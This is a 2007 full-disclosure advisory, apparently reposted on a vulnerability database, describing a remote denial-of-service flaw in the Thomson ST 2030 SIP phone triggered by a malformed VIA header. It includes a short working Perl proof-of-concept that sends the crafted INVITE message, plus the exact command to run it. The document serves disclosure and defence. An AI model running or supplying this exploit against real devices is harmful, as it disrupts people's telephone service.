Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17894
HistoryAug 27, 2007 - 12:00 a.m.

[Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030 using the VIA Header

2007-08-2700:00:00
vulners.com
14
JSON

MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030

Date of Discovery 15 February, 2007

Vendor was notified on 1 March 2007

ID: KIPH8

Synopsis

After sending a message where the a space is replaced by a slash after the
SIP version in the VIA, the device looks functional but in fact does not
respond to any event provoking a DoS.

Background

SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session.

Affected devices: Thomson SIP phone ST 2030

Impact :

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP message.

Resolution

Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations.

Credits

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en),

Configuration of our device:

Software Version: v1.52.1

IP-Address obtained by DHCP as 192.168.1.106

User name : thomson

To run the exploit the file thomson-2030-3.pl should be launched (assuming
our configurations) as:

perl thomson-2030-3.pl 192.168.1.106 5060 thomson

POC Code :

!/usr/bin/perl

#Vulnerability for Thomson 2030 firmware v1.52.1

#It provokes a DoS in the device.

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

    Proto=&gt;&#39;udp&#39;,

    PeerAddr=&gt;$ARGV[0]&#41;;

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:
SIP/2.0/UDP\\192.168.1.2;branch=00\r\nFrom: Caripe
<sip:caripe\@192.168.1.2>;tag=00\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: caripe\@192.168.1.2\r\nCSeq: 2
INVITE\r\n\r\n";

$socket->send($msg);

JSON